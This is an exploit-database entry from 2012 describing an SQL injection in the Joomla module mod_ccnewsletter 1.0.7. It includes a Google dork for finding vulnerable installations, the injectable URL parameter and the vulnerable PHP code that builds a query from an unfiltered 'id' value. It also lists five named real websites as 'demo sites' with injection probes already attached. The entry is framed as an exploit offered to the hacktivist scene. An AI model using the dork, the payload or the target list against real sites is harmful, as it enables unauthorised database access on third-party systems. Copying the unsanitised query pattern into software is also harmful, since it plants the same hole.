Joomla component (mod_ccnewsletter) Sql Injection Vulnerablity

2012-04-23T00:00:00
ID 1337DAY-ID-18117
Type zdt
Reporter E1nzte1N
Modified 2012-04-23T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                               =============================================================
-={ Joomla Component (mod_ccnewsletter) Sql Injection Vulnerablity }=-
   =============================================================
########################################################################################################
# Exploit Title : Joomla Module (mod_ccnewsletter) Sql Injection Vulnerablity
# Software Link : http://www.joomlaos.de/option,com_remository/Itemid,41/func,finishdown/id,4197.html
# Version	: 1.0.7
# Date          : 23/04/2012
# Author        : E1nzte1N
# Site home     : 1337day.com Milw0rm Team
# E-mail        : [email protected]
# Category      : webapps
# Google dork	: inurl:/modules/mod_ccnewsletter/helper/popup.php
# Tested on     : Windows
########################################################################################################

#Exploit/p0c :
 http://localhost/modules/mod_ccnewsletter/helper/popup.php?id=[SQLi]

########################################################################################################
 Bug on file popup.php, in line >>$content_id = JRequest::getVar( 'id', '', 'get', 'string');
========================================================================================================

if(!isset($mainframe))
 $mainframe =& JFactory::getApplication('site');
 $db =& JFactory::getDBO();
 $content_id = JRequest::getVar( 'id', '', 'get', 'string');     <<= request string value "id" without filtering.
 $query = 'SELECT *  FROM #__content WHERE id ='.$content_id;
 $db->setQuery( $query );
 $row = $db->loadObject();

=========================================================================================================

# Demo Sites :    => http://www.trirunners.com/modules/mod_ccnewsletter/helper/popup.php?id=71'
		  => http://www.valdesi.eu/modules/mod_ccnewsletter/helper/popup.php?id=109'
		  => http://www.kvalis.com/modules/mod_ccnewsletter/helper/popup.php?id=588'
		  => http://www.fanticostruzioni.com/modules/mod_ccnewsletter/helper/popup.php?id=6'
		  => http://www.cd-dvd-klastor.com/modules/mod_ccnewsletter/helper/popup.php?id=63'


########################################################################################################

      ==>> Special Thanks <<==
 ...:::' 1337day Inj3ct0r TEAM ':::...
 [ All Staff & 31337 Member Inj3ct0r TEAM ]
 , And All Inj3ct0r Fans & All Hacktivist,,, :-) 


 ############################################################################
 [            Me @ SRAGEN, Bumi Sukowati, 23 April 2012 @ 13:47 PM.         ]
 [ Inj3ct0r | PacketStromSecurity | Exploit-ID | Devilzc0de | Hacker-Newbie ]
 ############################################################################



#  0day.today [2018-01-04]  #